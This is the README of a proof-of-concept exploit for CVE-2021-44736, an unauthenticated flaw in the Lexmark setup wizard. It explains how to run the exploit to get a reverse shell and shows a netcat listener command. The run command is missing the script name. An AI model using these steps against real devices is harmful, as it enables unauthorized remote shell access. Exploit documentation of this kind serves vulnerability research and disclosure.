# CVE-2021-44736 PoC

The initial admin account setup wizard on Lexmark devices allow unauthenticated access to the “out of service erase” feature.
Exploit based on the following research

## Using

To run the exploit pass 2 arguments:

- rhost - IP-address of the interface for reverse-shell connection
- rport - port number for reverse-shell connection

python3 -r <rhost> -p <rport>


To receive a reverse-shell connection start listener on the specified lhost and lport, for example using `netcat`:

nc -nvlp 8080